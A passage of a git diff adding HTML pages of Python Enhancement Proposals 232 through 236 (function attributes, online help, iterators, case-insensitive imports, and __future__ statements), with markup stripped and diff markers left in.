Countering some of these arguments is the observation that with +vanilla Python 2.0, __doc__ can in fact be set to any type of +object, so some semblance of writable function attributes are +already feasible. But that approach is yet another corruption of +__doc__.

+

And while it is of course possible to add mappings to class +objects (or in the case of function attributes, to the function’s +module), it is more difficult and less obvious how to extract the +attribute values for inspection.

+

Finally, it may be desirable to add syntactic support, much the +same way that __doc__ syntactic support exists. This can be +considered separately from the ability to actually set and get +function attributes.

+
+
+

Reference Implementation

+

This PEP has been accepted and the implementation has been +integrated into Python 2.1.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0232.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0233/index.html b/pep-0233/index.html new file mode 100644 index 00000000000..ba4c12e5623 --- /dev/null +++ b/pep-0233/index.html @@ -0,0 +1,207 @@ + + + + + + + + PEP 233 – Python Online Help | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 233 – Python Online Help

+
+
Author:
+
Paul Prescod <paul at prescod.net>
+
Status:
+
Deferred
+
Type:
+
Standards Track
+
Created:
+
11-Dec-2000
+
Python-Version:
+
2.1
+
Post-History:
+

+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP describes a command-line driven online help facility for +Python. The facility should be able to build on existing +documentation facilities such as the Python documentation and +docstrings. It should also be extensible for new types and +modules.

+
+
+

Interactive use

+

Simply typing help describes the help function (through repr() +overloading).

+

help can also be used as a function.

+

The function takes the following forms of input:

+
    +
  • help( "string" ) – built-in topic or global
  • +
  • help( <ob> ) – docstring from object or type
  • +
  • help( "doc:filename" ) – filename from Python documentation
  • +
+

If you ask for a global, it can be a fully-qualified name, such as:

+
help("xml.dom")
+
+
+

You can also use the facility from a command-line:

+
python --help if
+
+
+

In either situation, the output does paging similar to the more +command.

+
+
+

Implementation

+

The help function is implemented in an onlinehelp module which is +demand-loaded.

+

There should be options for fetching help information from +environments other than the command line through the onlinehelp +module:

+
onlinehelp.gethelp(object_or_string) -> string
+
+
+

It should also be possible to override the help display function +by assigning to onlinehelp.displayhelp(object_or_string).

+

The module should be able to extract module information from +either the HTML or LaTeX versions of the Python documentation. +Links should be accommodated in a “lynx-like” manner.

+

Over time, it should also be able to recognize when docstrings are +in “special” syntaxes like structured text, HTML and LaTeX and +decode them appropriately.

+

A prototype implementation is available with the Python source +distribution as nondist/sandbox/doctools/onlinehelp.py.

+
+
+

Built-in Topics

+
    +
  • help( "intro" ) – What is Python? Read this first!
  • +
  • help( "keywords" ) – What are the keywords?
  • +
  • help( "syntax" ) – What is the overall syntax?
  • +
  • help( "operators" ) – What operators are available?
  • +
  • help( "builtins" ) – What functions, types, etc. are built-in?
  • +
  • help( "modules" ) – What modules are in the standard library?
  • +
  • help( "copyright" ) – Who owns Python?
  • +
  • help( "moreinfo" ) – Where is there more information?
  • +
  • help( "changes" ) – What changed in Python 2.0?
  • +
  • help( "extensions" ) – What extensions are installed?
  • +
  • help( "faq" ) – What questions are frequently asked?
  • +
  • help( "ack" ) – Who has done work on Python lately?
  • +
+
+
+

Security Issues

+

This module will attempt to import modules with the same names as +requested topics. Don’t use the modules if you are not confident +that everything in your PYTHONPATH is from a trusted source.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0233.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0234/index.html b/pep-0234/index.html new file mode 100644 index 00000000000..7ed56123ce7 --- /dev/null +++ b/pep-0234/index.html @@ -0,0 +1,531 @@ + + + + + + + + PEP 234 – Iterators | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 234 – Iterators

+
+
Author:
+
Ka-Ping Yee <ping at zesty.ca>, Guido van Rossum <guido at python.org>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
30-Jan-2001
+
Python-Version:
+
2.1
+
Post-History:
+
30-Apr-2001
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document proposes an iteration interface that objects can provide to +control the behaviour of for loops. Looping is customized by providing a +method that produces an iterator object. The iterator provides a get next +value operation that produces the next item in the sequence each time it is +called, raising an exception when no more items are available.

+

In addition, specific iterators over the keys of a dictionary and over the +lines of a file are proposed, and a proposal is made to allow spelling +dict.has_key(key) as key in dict.

+

Note: this is an almost complete rewrite of this PEP by the second author, +describing the actual implementation checked into the trunk of the Python 2.2 +CVS tree. It is still open for discussion. Some of the more esoteric +proposals in the original version of this PEP have been withdrawn for now; +these may be the subject of a separate PEP in the future.

+
+
+

C API Specification

+

A new exception is defined, StopIteration, which can be used to signal the +end of an iteration.

+

A new slot named tp_iter for requesting an iterator is added to the type +object structure. This should be a function of one PyObject * argument +returning a PyObject *, or NULL. To use this slot, a new C API +function PyObject_GetIter() is added, with the same signature as the +tp_iter slot function.

+

Another new slot, named tp_iternext, is added to the type structure, for +obtaining the next value in the iteration. To use this slot, a new C API +function PyIter_Next() is added. The signature for both the slot and the +API function is as follows, although the NULL return conditions differ: +the argument is a PyObject * and so is the return value. When the return +value is non-NULL, it is the next value in the iteration. When it is +NULL, then for the tp_iternext slot there are three possibilities:

+
    +
  • No exception is set; this implies the end of the iteration.
  • +
  • The StopIteration exception (or a derived exception class) is set; this +implies the end of the iteration.
  • +
  • Some other exception is set; this means that an error occurred that should be +propagated normally.
  • +
+

The higher-level PyIter_Next() function clears the StopIteration +exception (or derived exception) when it occurs, so its NULL return +conditions are simpler:

+
    +
  • No exception is set; this means iteration has ended.
  • +
  • Some exception is set; this means an error occurred, and should be propagated +normally.
  • +
+

Iterators implemented in C should not implement a next() method with +similar semantics as the tp_iternext slot! When the type’s dictionary is +initialized (by PyType_Ready()), the presence of a tp_iternext slot +causes a method next() wrapping that slot to be added to the type’s +tp_dict. (Exception: if the type doesn’t use PyObject_GenericGetAttr() +to access instance attributes, the next() method in the type’s tp_dict +may not be seen.) (Due to a misunderstanding in the original text of this PEP, +in Python 2.2, all iterator types implemented a next() method that was +overridden by the wrapper; this has been fixed in Python 2.3.)

+

To ensure binary backwards compatibility, a new flag Py_TPFLAGS_HAVE_ITER +is added to the set of flags in the tp_flags field, and to the default +flags macro. This flag must be tested before accessing the tp_iter or +tp_iternext slots. The macro PyIter_Check() tests whether an object +has the appropriate flag set and has a non-NULL tp_iternext slot. +There is no such macro for the tp_iter slot (since the only place where +this slot is referenced should be PyObject_GetIter(), and this can check +for the Py_TPFLAGS_HAVE_ITER flag directly).

+

(Note: the tp_iter slot can be present on any object; the tp_iternext +slot should only be present on objects that act as iterators.)

+

For backwards compatibility, the PyObject_GetIter() function implements +fallback semantics when its argument is a sequence that does not implement a +tp_iter function: a lightweight sequence iterator object is constructed in +that case which iterates over the items of the sequence in the natural order.

+

The Python bytecode generated for for loops is changed to use new opcodes, +GET_ITER and FOR_ITER, that use the iterator protocol rather than the +sequence protocol to get the next value for the loop variable. This makes it +possible to use a for loop to loop over non-sequence objects that support +the tp_iter slot. Other places where the interpreter loops over the values +of a sequence should also be changed to use iterators.

+

Iterators ought to implement the tp_iter slot as returning a reference to +themselves; this is needed to make it possible to use an iterator (as opposed +to a sequence) in a for loop.

+

Iterator implementations (in C or in Python) should guarantee that once the +iterator has signalled its exhaustion, subsequent calls to tp_iternext or +to the next() method will continue to do so. It is not specified whether +an iterator should enter the exhausted state when an exception (other than +StopIteration) is raised. Note that Python cannot guarantee that +user-defined or 3rd party iterators implement this requirement correctly.

+
+
+

Python API Specification

+

The StopIteration exception is made visible as one of the standard +exceptions. It is derived from Exception.

+

A new built-in function is defined, iter(), which can be called in two +ways:

+
    +
  • iter(obj) calls PyObject_GetIter(obj).
  • +
  • iter(callable, sentinel) returns a special kind of iterator that calls +the callable to produce a new value, and compares the return value to the +sentinel value. If the return value equals the sentinel, this signals the +end of the iteration and StopIteration is raised rather than returning +normal; if the return value does not equal the sentinel, it is returned as +the next value from the iterator. If the callable raises an exception, this +is propagated normally; in particular, the function is allowed to raise +StopIteration as an alternative way to end the iteration. (This +functionality is available from the C API as +PyCallIter_New(callable, sentinel).)
  • +
+

Iterator objects returned by either form of iter() have a next() +method. This method either returns the next value in the iteration, or raises +StopIteration (or a derived exception class) to signal the end of the +iteration. Any other exception should be considered to signify an error and +should be propagated normally, not taken to mean the end of the iteration.

+

Classes can define how they are iterated over by defining an __iter__() +method; this should take no additional arguments and return a valid iterator +object. A class that wants to be an iterator should implement two methods: a +next() method that behaves as described above, and an __iter__() method +that returns self.

+

The two methods correspond to two distinct protocols:

+
    +
  1. An object can be iterated over with for if it implements __iter__() +or __getitem__().
  2. +
  3. An object can function as an iterator if it implements next().
  4. +
+

Container-like objects usually support protocol 1. Iterators are currently +required to support both protocols. The semantics of iteration come only from +protocol 2; protocol 1 is present to make iterators behave like sequences; in +particular so that code receiving an iterator can use a for-loop over the +iterator.

+
+
+

Dictionary Iterators

+
    +
  • Dictionaries implement a sq_contains slot that implements the same test +as the has_key() method. This means that we can write
    if k in dict: ...
    +
    +
    +

    which is equivalent to

    +
    if dict.has_key(k): ...
    +
    +
    +
  • +
  • Dictionaries implement a tp_iter slot that returns an efficient iterator +that iterates over the keys of the dictionary. During such an iteration, the +dictionary should not be modified, except that setting the value for an +existing key is allowed (deletions or additions are not, nor is the +update() method). This means that we can write
    for k in dict: ...
    +
    +
    +

    which is equivalent to, but much faster than

    +
    for k in dict.keys(): ...
    +
    +
    +

    as long as the restriction on modifications to the dictionary (either by the +loop or by another thread) are not violated.

    +
  • +
  • Add methods to dictionaries that return different kinds of iterators +explicitly:
    for key in dict.iterkeys(): ...
    +
    +for value in dict.itervalues(): ...
    +
    +for key, value in dict.iteritems(): ...
    +
    +
    +

    This means that for x in dict is shorthand for +for x in dict.iterkeys().

    +
  • +
+

Other mappings, if they support iterators at all, should also iterate over the +keys. However, this should not be taken as an absolute rule; specific +applications may have different requirements.

+
+
+

File Iterators

+

The following proposal is useful because it provides us with a good answer to +the complaint that the common idiom to iterate over the lines of a file is ugly +and slow.

+
    +
  • Files implement a tp_iter slot that is equivalent to +iter(f.readline, ""). This means that we can write
    for line in file:
    +    ...
    +
    +
    +

    as a shorthand for

    +
    for line in iter(file.readline, ""):
    +    ...
    +
    +
    +

    which is equivalent to, but faster than

    +
    while 1:
    +    line = file.readline()
    +    if not line:
    +        break
    +    ...
    +
    +
    +
  • +
+

This also shows that some iterators are destructive: they consume all the +values and a second iterator cannot easily be created that iterates +independently over the same values. You could open the file for a second time, +or seek() to the beginning, but these solutions don’t work for all file +types, e.g. they don’t work when the open file object really represents a pipe +or a stream socket.

+

Because the file iterator uses an internal buffer, mixing this with other file +operations (e.g. file.readline()) doesn’t work right. Also, the following +code:

+
for line in file:
+    if line == "\n":
+        break
+for line in file:
+   print line,
+
+
+

doesn’t work as you might expect, because the iterator created by the second +for-loop doesn’t take the buffer read-ahead by the first for-loop into account. +A correct way to write this is:

+
it = iter(file)
+for line in it:
+    if line == "\n":
+        break
+for line in it:
+    print line,
+
+
+

(The rationale for these restrictions are that for line in file ought to +become the recommended, standard way to iterate over the lines of a file, and +this should be as fast as can be. The iterator version is considerable faster +than calling readline(), due to the internal buffer in the iterator.)

+
+
+

Rationale

+

If all the parts of the proposal are included, this addresses many concerns in +a consistent and flexible fashion. Among its chief virtues are the following +four – no, five – no, six – points:

+
    +
  1. It provides an extensible iterator interface.
  2. +
  3. It allows performance enhancements to list iteration.
  4. +
  5. It allows big performance enhancements to dictionary iteration.
  6. +
  7. It allows one to provide an interface for just iteration without pretending +to provide random access to elements.
  8. +
  9. It is backward-compatible with all existing user-defined classes and +extension objects that emulate sequences and mappings, even mappings that +only implement a subset of {__getitem__, keys, values, +items}.
  10. +
  11. It makes code iterating over non-sequence collections more concise and +readable.
  12. +
+
+
+

Resolved Issues

+

The following topics have been decided by consensus or BDFL pronouncement.

+
    +
  • Two alternative spellings for next() have been proposed but rejected: +__next__(), because it corresponds to a type object slot +(tp_iternext); and __call__(), because this is the only operation.

    Arguments against __next__(): while many iterators are used in for loops, +it is expected that user code will also call next() directly, so having +to write __next__() is ugly; also, a possible extension of the protocol +would be to allow for prev(), current() and reset() operations; +surely we don’t want to use __prev__(), __current__(), +__reset__().

    +

    Arguments against __call__() (the original proposal): taken out of +context, x() is not very readable, while x.next() is clear; there’s a +danger that every special-purpose object wants to use __call__() for its +most common operation, causing more confusion than clarity.

    +

    (In retrospect, it might have been better to go for __next__() and have a +new built-in, next(it), which calls it.__next__(). But alas, it’s too +late; this has been deployed in Python 2.2 since December 2001.)

    +
  • +
  • Some folks have requested the ability to restart an iterator. This should be +dealt with by calling iter() on a sequence repeatedly, not by the +iterator protocol itself. (See also requested extensions below.)
  • +
  • It has been questioned whether an exception to signal the end of the +iteration isn’t too expensive. Several alternatives for the +StopIteration exception have been proposed: a special value End to +signal the end, a function end() to test whether the iterator is +finished, even reusing the IndexError exception.
      +
    • A special value has the problem that if a sequence ever contains that +special value, a loop over that sequence will end prematurely without any +warning. If the experience with null-terminated C strings hasn’t taught us +the problems this can cause, imagine the trouble a Python introspection +tool would have iterating over a list of all built-in names, assuming that +the special End value was a built-in name!
    • +
    • Calling an end() function would require two calls per iteration. Two +calls is much more expensive than one call plus a test for an exception. +Especially the time-critical for loop can test very cheaply for an +exception.
    • +
    • Reusing IndexError can cause confusion because it can be a genuine +error, which would be masked by ending the loop prematurely.
    • +
    +
  • +
  • Some have asked for a standard iterator type. Presumably all iterators would +have to be derived from this type. But this is not the Python way: +dictionaries are mappings because they support __getitem__() and a +handful other operations, not because they are derived from an abstract +mapping type.
  • +
  • Regarding if key in dict: there is no doubt that the dict.has_key(x) +interpretation of x in dict is by far the most useful interpretation, +probably the only useful one. There has been resistance against this because +x in list checks whether x is present among the values, while the +proposal makes x in dict check whether x is present among the keys. +Given that the symmetry between lists and dictionaries is very weak, this +argument does not have much weight.
  • +
  • The name iter() is an abbreviation. Alternatives proposed include +iterate(), traverse(), but these appear too long. Python has a +history of using abbrs for common builtins, e.g. repr(), str(), +len().

    Resolution: iter() it is.

    +
  • +
  • Using the same name for two different operations (getting an iterator from an +object and making an iterator for a function with a sentinel value) is +somewhat ugly. I haven’t seen a better name for the second operation though, +and since they both return an iterator, it’s easy to remember.

    Resolution: the builtin iter() takes an optional argument, which is the +sentinel to look for.

    +
  • +
  • Once a particular iterator object has raised StopIteration, will it also +raise StopIteration on all subsequent next() calls? Some say that it +would be useful to require this, others say that it is useful to leave this +open to individual iterators. Note that this may require an additional state +bit for some iterator implementations (e.g. function-wrapping iterators).

    Resolution: once StopIteration is raised, calling it.next() continues +to raise StopIteration.

    +

    Note: this was in fact not implemented in Python 2.2; there are many cases +where an iterator’s next() method can raise StopIteration on one call +but not on the next. This has been remedied in Python 2.3.

    +
  • +
  • It has been proposed that a file object should be its own iterator, with a +next() method returning the next line. This has certain advantages, and +makes it even clearer that this iterator is destructive. The disadvantage is +that this would make it even more painful to implement the “sticky +StopIteration” feature proposed in the previous bullet.

    Resolution: tentatively rejected (though there are still people arguing for +this).

    +
  • +
  • Some folks have requested extensions of the iterator protocol, e.g. +prev() to get the previous item, current() to get the current item +again, finished() to test whether the iterator is finished, and maybe +even others, like rewind(), __len__(), position().

    While some of these are useful, many of these cannot easily be implemented +for all iterator types without adding arbitrary buffering, and sometimes they +can’t be implemented at all (or not reasonably). E.g. anything to do with +reversing directions can’t be done when iterating over a file or function. +Maybe a separate PEP can be drafted to standardize the names for such +operations when they are implementable.

    +

    Resolution: rejected.

    +
  • +
  • There has been a long discussion about whether
    for x in dict: ...
    +
    +
    +

    should assign x the successive keys, values, or items of the dictionary. +The symmetry between if x in y and for x in y suggests that it should +iterate over keys. This symmetry has been observed by many independently and +has even been used to “explain” one using the other. This is because for +sequences, if x in y iterates over y comparing the iterated values to +x. If we adopt both of the above proposals, this will also hold for +dictionaries.

    +

    The argument against making for x in dict iterate over the keys comes +mostly from a practicality point of view: scans of the standard library show +that there are about as many uses of for x in dict.items() as there are +of for x in dict.keys(), with the items() version having a small +majority. Presumably many of the loops using keys() use the +corresponding value anyway, by writing dict[x], so (the argument goes) by +making both the key and value available, we could support the largest number +of cases. While this is true, I (Guido) find the correspondence between +for x in dict and if x in dict too compelling to break, and there’s +not much overhead in having to write dict[x] to explicitly get the value.

    +

    For fast iteration over items, use for key, value in dict.iteritems(). +I’ve timed the difference between

    +
    for key in dict: dict[key]
    +
    +
    +

    and

    +
    for key, value in dict.iteritems(): pass
    +
    +
    +

    and found that the latter is only about 7% faster.

    +

    Resolution: By BDFL pronouncement, for x in dict iterates over the keys, +and dictionaries have iteritems(), iterkeys(), and itervalues() +to return the different flavors of dictionary iterators.

    +
  • +
+
+
+

Mailing Lists

+

The iterator protocol has been discussed extensively in a mailing list on +SourceForge:

+
+
+

Initially, some of the discussion was carried out at Yahoo; archives are still +accessible:

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0234.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0235/index.html b/pep-0235/index.html new file mode 100644 index 00000000000..13d7620b075 --- /dev/null +++ b/pep-0235/index.html @@ -0,0 +1,252 @@ + + + + + + + + PEP 235 – Import on Case-Insensitive Platforms | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 235 – Import on Case-Insensitive Platforms

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
21-Feb-2001
+
Python-Version:
+
2.1
+
Post-History:
+
16-Feb-2001
+
+
+
+
Table of Contents +
+
+

Note

+

This is essentially a retroactive PEP: the issue came up too late +in the 2.1 release process to solicit wide opinion before deciding +what to do, and can’t be put off until 2.2 without also delaying +the Cygwin and MacOS X ports.

+
+
+

Motivation

+

File systems vary across platforms in whether or not they preserve +the case of filenames, and in whether or not the platform C +library file-opening functions do or don’t insist on +case-sensitive matches:

+
                     case-preserving     case-destroying
+                 +-------------------+------------------+
+case-sensitive   | most Unix flavors | brrrrrrrrrr      |
+                 +-------------------+------------------+
+case-insensitive | Windows           | some unfortunate |
+                 | MacOSX HFS+       | network schemes  |
+                 | Cygwin            |                  |
+                 |                   | OpenVMS          |
+                 +-------------------+------------------+
+
+
+

In the upper left box, if you create “fiLe” it’s stored as “fiLe”, +and only open("fiLe") will open it (open("file") will not, nor +will the 14 other variations on that theme).

+

In the lower right box, if you create “fiLe”, there’s no telling +what it’s stored as – but most likely as “FILE” – and any of the +16 obvious variations on open("FilE") will open it.

+

The lower left box is a mix: creating “fiLe” stores “fiLe” in the +platform directory, but you don’t have to match case when opening +it; any of the 16 obvious variations on open("FILe") work.

+

NONE OF THAT IS CHANGING! Python will continue to follow platform +conventions w.r.t. whether case is preserved when creating a file, +and w.r.t. whether open() requires a case-sensitive match. In +practice, you should always code as if matches were +case-sensitive, else your program won’t be portable.

+

What’s proposed is to change the semantics of Python “import” +statements, and there only in the lower left box.

+
+
+

Current Lower-Left Semantics

+

Support for MacOSX HFS+, and for Cygwin, is new in 2.1, so nothing +is changing there. What’s changing is Windows behavior. Here are +the current rules for import on Windows:

+
    +
  1. Despite that the filesystem is case-insensitive, Python insists +on a case-sensitive match. But not in the way the upper left +box works: if you have two files, FiLe.py and file.py on +sys.path, and do
    import file
    +
    +
    +

    then if Python finds FiLe.py first, it raises a NameError. +It does not go on to find file.py; indeed, it’s impossible to +import any but the first case-insensitive match on sys.path, +and then only if case matches exactly in the first +case-insensitive match.

    +
  2. +
  3. An ugly exception: if the first case-insensitive match on +sys.path is for a file whose name is entirely in upper case +(FILE.PY or FILE.PYC or FILE.PYO), then the import silently +grabs that, no matter what mixture of case was used in the +import statement. This is apparently to cater to miserable old +filesystems that really fit in the lower right box. But this +exception is unique to Windows, for reasons that may or may not +exist.
  4. +
  5. And another exception: if the environment variable PYTHONCASEOK +exists, Python silently grabs the first case-insensitive match +of any kind.
  6. +
+

So these Windows rules are pretty complicated, and neither match +the Unix rules nor provide semantics natural for the native +filesystem. That makes them hard to explain to Unix or Windows +users. Nevertheless, they’ve worked fine for years, and in +isolation there’s no compelling reason to change them.

+

However, that was before the MacOSX HFS+ and Cygwin ports arrived. +They also have case-preserving case-insensitive filesystems, but +the people doing the ports despised the Windows rules. Indeed, a +patch to make HFS+ act like Unix for imports got past a reviewer +and into the code base, which incidentally made Cygwin also act +like Unix (but this met the unbounded approval of the Cygwin +folks, so they sure didn’t complain – they had patches of their +own pending to do this, but the reviewer for those balked).

+

At a higher level, we want to keep Python consistent, by following +the same rules on all platforms with case-preserving +case-insensitive filesystems.

+
+
+

Proposed Semantics

+

The proposed new semantics for the lower left box:

+
    +
  1. If the PYTHONCASEOK environment variable exists, same as +before: silently accept the first case-insensitive match of any +kind; raise ImportError if none found.
  2. +
  3. Else search sys.path for the first case-sensitive match; raise +ImportError if none found.
  4. +
+

#B is the same rule as is used on Unix, so this will improve +cross-platform portability. That’s good. #B is also the rule the Mac +and Cygwin folks want (and wanted enough to implement themselves, +multiple times, which is a powerful argument in PythonLand). It +can’t cause any existing non-exceptional Windows import to fail, +because any existing non-exceptional Windows import finds a +case-sensitive match first in the path – and it still will. An +exceptional Windows import currently blows up with a NameError or +ImportError, in which latter case it still will, or in which +former case will continue searching, and either succeed or blow up +with an ImportError.

+

#A is needed to cater to case-destroying filesystems mounted on Windows, +and may also be used by people so enamored of “natural” Windows +behavior that they’re willing to set an environment variable to +get it. I don’t intend to implement #A for Unix too, but that’s +just because I’m not clear on how I could do so efficiently (I’m +not going to slow imports under Unix just for theoretical purity).

+

The potential damage is here: #2 (matching on ALLCAPS.PY) is +proposed to be dropped. Case-destroying filesystems are a +vanishing breed, and support for them is ugly. We’re already +supporting (and will continue to support) PYTHONCASEOK for their +benefit, but they don’t deserve multiple hacks in 2001.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0235.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0236/index.html b/pep-0236/index.html new file mode 100644 index 00000000000..8d54a1e0fe8 --- /dev/null +++ b/pep-0236/index.html @@ -0,0 +1,467 @@ + + + + + + + + PEP 236 – Back to the __future__ | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 236 – Back to the __future__

+
+
Author:
+
Tim Peters <tim.peters at gmail.com>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
26-Feb-2001
+
Python-Version:
+
2.1
+
Post-History:
+
26-Feb-2001
+
+
+
+
Table of Contents +
+
+

Motivation

+

From time to time, Python makes an incompatible change to the advertised +semantics of core language constructs, or changes their accidental +(implementation-dependent) behavior in some way. While this is never done +capriciously, and is always done with the aim of improving the language over +the long term, over the short term it’s contentious and disrupting.

+

PEP 5, Guidelines for Language Evolution suggests ways to ease the pain, +and this PEP introduces some machinery in support of that.

+

PEP 227, Statically Nested Scopes is the first application, and will be +used as an example here.

+
+
+

Intent

+

[Note: This is policy, and so should eventually move into PEP 5]

+

When an incompatible change to core language syntax or semantics is being +made:

+
    +
  1. The release C that introduces the change does not change the syntax or +semantics by default.
  2. +
  3. A future release R is identified in which the new syntax or semantics will +be enforced.
  4. +
  5. The mechanisms described in PEP 230, Warning Framework are used to +generate warnings, whenever possible, about constructs or operations whose +meaning may [1] change in release R.
  6. +
  7. The new future_statement (see below) can be explicitly included in a module +M to request that the code in module M use the new syntax or semantics in +the current release C.
  8. +
+

So old code continues to work by default, for at least one release, although +it may start to generate new warning messages. Migration to the new syntax or +semantics can proceed during that time, using the future_statement to make +modules containing it act as if the new syntax or semantics were already being +enforced.

+

Note that there is no need to involve the future_statement machinery in new +features unless they can break existing code; fully backward- compatible +additions can– and should –be introduced without a corresponding +future_statement.

+
+
+

Syntax

+

A future_statement is simply a from/import statement using the reserved module +name __future__:

+
future_statement: "from" "__future__" "import" feature ["as" name]
+                  (","feature ["as" name])*
+
+feature: identifier
+name: identifier
+
+
+

In addition, all future_statements must appear near the top of the module. The +only lines that can appear before a future_statement are:

+
    +
  • The module docstring (if any).
  • +
  • Comments.
  • +
  • Blank lines.
  • +
  • Other future_statements.
  • +
+

Example:

+
"""This is a module docstring."""
+
+# This is a comment, preceded by a blank line and followed by
+# a future_statement.
+from __future__ import nested_scopes
+
+from math import sin
+from __future__ import alabaster_weenoblobs  # compile-time error!
+# That was an error because preceded by a non-future_statement.
+
+
+
+
+

Semantics

+

A future_statement is recognized and treated specially at compile time: +changes to the semantics of core constructs are often implemented by +generating different code. It may even be the case that a new feature +introduces new incompatible syntax (such as a new reserved word), in which +case the compiler may need to parse the module differently. Such decisions +cannot be pushed off until runtime.

+

For any given release, the compiler knows which feature names have been +defined, and raises a compile-time error if a future_statement contains a +feature not known to it [2].

+

The direct runtime semantics are the same as for any import statement: +there is a standard module __future__.py, described later, and it will be +imported in the usual way at the time the future_statement is executed.

+

The interesting runtime semantics depend on the specific feature(s) +“imported” by the future_statement(s) appearing in the module.

+

Note that there is nothing special about the statement:

+
import __future__ [as name]
+
+
+

That is not a future_statement; it’s an ordinary import statement, with no +special semantics or syntax restrictions.

+
+
+

Example

+

Consider this code, in file scope.py:

+
x = 42
+def f():
+    x = 666
+    def g():
+        print "x is", x
+    g()
+f()
+
+
+

Under 2.0, it prints:

+
x is 42
+
+
+

Nested scopes (PEP 227) are being introduced in 2.1. But under 2.1, it still +prints:

+
x is 42
+
+
+

and also generates a warning.

+

In 2.2, and also in 2.1 if from __future__ import nested_scopes is +included at the top of scope.py, it prints:

+
x is 666
+
+
+
+
+

Standard Module __future__.py

+

Lib/__future__.py is a real module, and serves three purposes:

+
    +
  1. To avoid confusing existing tools that analyze import statements and expect +to find the modules they’re importing.
  2. +
  3. To ensure that future_statements run under releases prior to 2.1 at least +yield runtime exceptions (the import of __future__ will fail, because +there was no module of that name prior to 2.1).
  4. +
  5. To document when incompatible changes were introduced, and when they will +be– or were –made mandatory. This is a form of executable documentation, +and can be inspected programmatically via importing __future__ and +examining its contents.
  6. +
+

Each statement in __future__.py is of the form:

+
FeatureName = "_Feature(" OptionalRelease "," MandatoryRelease ")"
+
+
+

where, normally, OptionalRelease < MandatoryRelease, and both are +5-tuples of the same form as sys.version_info:

+
(PY_MAJOR_VERSION, # the 2 in 2.1.0a3; an int
+ PY_MINOR_VERSION, # the 1; an int
+ PY_MICRO_VERSION, # the 0; an int
+ PY_RELEASE_LEVEL, # "alpha", "beta", "candidate" or "final"; string
+ PY_RELEASE_SERIAL # the 3; an int )
+
+
+

OptionalRelease records the first release in which:

+
from __future__ import FeatureName
+
+
+

was accepted.

+

In the case of MandatoryReleases that have not yet occurred, +MandatoryRelease predicts the release in which the feature will become part +of the language.

+

Else MandatoryRelease records when the feature became part of the language; +in releases at or after that, modules no longer need:

+
from __future__ import FeatureName
+
+
+

to use the feature in question, but may continue to use such imports.

+

MandatoryRelease may also be None, meaning that a planned feature got +dropped.

+

Instances of class _Feature have two corresponding methods, +.getOptionalRelease() and .getMandatoryRelease().

+

No feature line will ever be deleted from __future__.py.

+

Example line:

+
nested_scopes = _Feature((2, 1, 0, "beta", 1), (2, 2, 0, "final", 0))
+
+
+

This means that:

+
from __future__ import nested_scopes
+
+
+

will work in all releases at or after 2.1b1, and that nested_scopes are +intended to be enforced starting in release 2.2.

+
+
+

Resolved Problem: Runtime Compilation

+

Several Python features can compile code during a module’s runtime:

+
    +
  1. The exec statement.
  2. +
  3. The execfile() function.
  4. +
  5. The compile() function.
  6. +
  7. The eval() function.
  8. +
  9. The input() function.
  10. +
+

Since a module M containing a future_statement naming feature F explicitly +requests that the current release act like a future release with respect to F, +any code compiled dynamically from text passed to one of these from within M +should probably also use the new syntax or semantics associated with F. The +2.1 release does behave this way.

+

This isn’t always desired, though. For example, doctest.testmod(M) +compiles examples taken from strings in M, and those examples should use M’s +choices, not necessarily the doctest module’s choices. In the 2.1 release, +this isn’t possible, and no scheme has yet been suggested for working around +this. NOTE: PEP 264 later addressed this in a flexible way, by adding +optional arguments to compile().

+

In any case, a future_statement appearing “near the top” (see Syntax above) of +text compiled dynamically by an exec, execfile() or compile() +applies to the code block generated, but has no further effect on the module +that executes such an exec, execfile() or compile(). This can’t +be used to affect eval() or input(), however, because they only allow +expression input, and a future_statement is not an expression.

+
+
+

Resolved Problem: Native Interactive Shells

+

There are two ways to get an interactive shell:

+
    +
  1. By invoking Python from a command line without a script argument.
  2. +
  3. By invoking Python from a command line with the -i switch and with a +script argument.
  4. +
+

An interactive shell can be seen as an extreme case of runtime compilation +(see above): in effect, each statement typed at an interactive shell prompt +runs a new instance of exec, compile() or execfile(). A +future_statement typed at an interactive shell applies to the rest of the +shell session’s life, as if the future_statement had appeared at the top of a +module.

+
+
+

Resolved Problem: Simulated Interactive Shells

+

Interactive shells “built by hand” (by tools such as IDLE and the Emacs +Python-mode) should behave like native interactive shells (see above). +However, the machinery used internally by native interactive shells has not +been exposed, and there isn’t a clear way for tools building their own +interactive shells to achieve the desired behavior.

+

